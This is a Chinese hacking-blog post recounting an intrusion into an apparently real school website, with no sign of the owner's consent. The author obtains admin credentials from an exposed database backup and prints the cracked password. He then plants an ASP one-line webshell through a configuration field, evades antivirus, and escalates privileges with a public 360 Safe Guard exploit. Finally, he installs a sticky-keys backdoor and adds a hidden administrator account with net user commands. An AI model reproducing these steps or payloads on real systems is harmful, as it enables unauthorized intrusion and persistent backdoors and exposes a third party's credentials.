危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2306 浏览20614491

抓住细节——记入侵某教育网站

这几天不知道做什么,就想给大家写点什么呢,恰好这几天正在帮一个群里的朋友检测一个网站,于是就把这个过程写了下来,使用的是什么CMS系统暂时还不太清楚,但是页脚地方却有个“管理登录”的链接,点击打开,发现真的是后台的登录页面。

大家应该清楚的看到了在后台登录页面上写着“学校网站管理系统Div+Css商业正式版”,到google上搜索了一下,确实也找到了这套系统的介绍,数据库使用的是Access或MSSQL,但即使是Access数据库也是随机名字的,看来不大好办,在后台登录的地方我试了试'or'='or'等万能密码,也没有成功。

二、路转

从WEB下手暂时遇到了困难,于是我打开扫描工具对目标服务器开始了全面细致的扫描,来看看目标服务器都开放了哪些端口,结果发现开放了80、21、3389端口,看到3389许多朋友都会感到兴奋吧,我又使用FTP弱口令扫描工具检测了一下FTP帐户,但是没什么结果,其实我们还可以测试一下目标服务器是否存在溢出漏洞的,但这个成功的概率实在太小了。最后我又使用WEB Security工具检测了一下WEB的安全性,当然这里检测的内容也不少,SQL Injection、Directory Scan等等。

在使用臭要饭的后台目录扫描工具的时候,得到了一些信息,看样子好像很有用,应该是数据库的备份文件,下载回来打开一看,是Idf和mdf文件,看来这个网站使用的是MSSQL数据库。我把下载回来的数据库备份文件导入到我的Windows虚拟机的MSSQL中,使用查询分析器来读取管理员的登录帐号,结果在mxjywebsiteschoolsql表中找到了dbo.wygkcn_admin字段,而且admin帐户的密码为c5b9629a16d63094,这是MD5加密过的,不过我的人品比较好,在CMD5网站上查询得到了明文密码为mxadmin(不过这条密码在查询时是需要付费的)。

使用得到的密码顺利的登录进入了后台,接下来就是得到Webshell了,我在后台弄了很久,发现即使修改了上传文件的类型,上传的地方也死活都不能上传我们的asp木马,后台也没有数据库备份之类的功能,我到google上搜索了一下,网上更没有关于这套系统的后台如何拿webshell的教程,看来只有自力更生了。

从后台看到了这套系统是网域高科搞出来的,于是就到他们官网下载了一套系统进行研究。在源码中寻找着有价值的线索,结果我在inc文件夹下找到了一个名为config.asp的文件,这是很典型的网站配置信息,居然是存放在asp文件中,这可是很危险的,我在后台的“系统配置”一“网站属性”中找到了读写这个配置文件的地方。

这里的和用方式就很多了,我选择了在“自定义底部(BOTTOM)菜单:”中填入特殊构造的一句话""%><%execute request("#")%>,这样就会使得inc\config.asp变成别的样子,充分闭合好前后的asp代码后一句话木马就可以运行了,然后我们就可以使用一句话木马客户端来连接得到webshell了。填写好我们的一句话木马,保存修改,使用客户端进行连接,webshell就这样到手了。

三、提权

Webshell拿到手了,检测网站的任务应该说已经算是完成了,但是为了检测的更彻底一点,我准备再尝试一下看能不能获取系统权限拿下3389。这台服务器还支持aspx解析,看来提权还是很有希望的,一般来说asp的权限默认是低于guest权限的,因此在提权的时候限制会很多,甚至琏本地溢出都不能使用,但是aspx的权限却是user,所以我们的权限也就大了很多。

服务器上的cmd.exe、net.exe、netl.exe都没有权限访问,我上传常用的程序也总是上传不成功,后来通过webshell执行了fasklist命令查看进程信息,才发现是服务器上的金山毒霸在作怪。把工具进行了免杀处理后才成功的上传到了可写目录“C:\RECYCLER\”,现在就可以执行ipconfig和netstat这样的简单命令了,但是net等命令依然无法执行,我试了试以前很好用的MS08067和Taken Kidnapping提权,但都失败了,服务器上还安装有360安全卫士,所以系统漏洞的补丁也应该都是打齐的,所以不能利用系统漏洞进行溢出也很正常。

服务器上也没有什么常见的第三方提权软件,就连FTP也都是使用微软自己的,正当提权陷入僵局的时候,我突然想到了前些日子360安全卫士不是爆出了本地溢出漏洞吗?在网上找了找这方面的资料,才发现360安全卫士爆出这个漏洞已经很久了,只是很少有人注意,网上也有漏洞利用程序的源代码,大家可以自由的改造,我就使用了网上现成的一个编译好的测试程序,这个程序在溢出成功后会操作注册表利用映像建立一个scthc后门,将sethe.exe劫持到cmd.exe上。

将漏洞利用程序经过免杀处理后上传到服务器上并执行,提示“Shift5 Backdoor created!”,这说明已经执行成功了。使用远程桌面连接服务器的3389,按下5次shift,sethc后门弹出成功了。在弹出的CMD窗口中分别执行net user ccca$ ccca444/add和netlocalgroup administrators ccca$/add,然后使用新添加的系统帐号登录,成功的看到了桌面,至此最高权限已经拿到。

四、后记

本文的重点还是希望大家能够注重入侵过程中的细节问题,我们的目光必须明锐才行,不能放过一丝可能的信息,还有就是利用360安全卫士提权虽然已经很老了,但是对于服务器升级效率不高的网站来说其威胁仍然不容小视,另外再说明一下,360在默认情况下是不会自动升级修补这个漏洞的,我的虚拟机中的360依然存在此漏洞,但是最新的7.0是没有这个漏洞的,要修补此漏洞看来需要手动升级才行的。另外,最近和360一同闹的沸沸扬扬的还有瑞星的本地提权,但是这个漏洞很快就被瑞星公司推出的补丁给修补了,程序自动升级就没有该漏洞了,所以在万般无奈的时候我们倒是可以检测一下360的提权漏洞!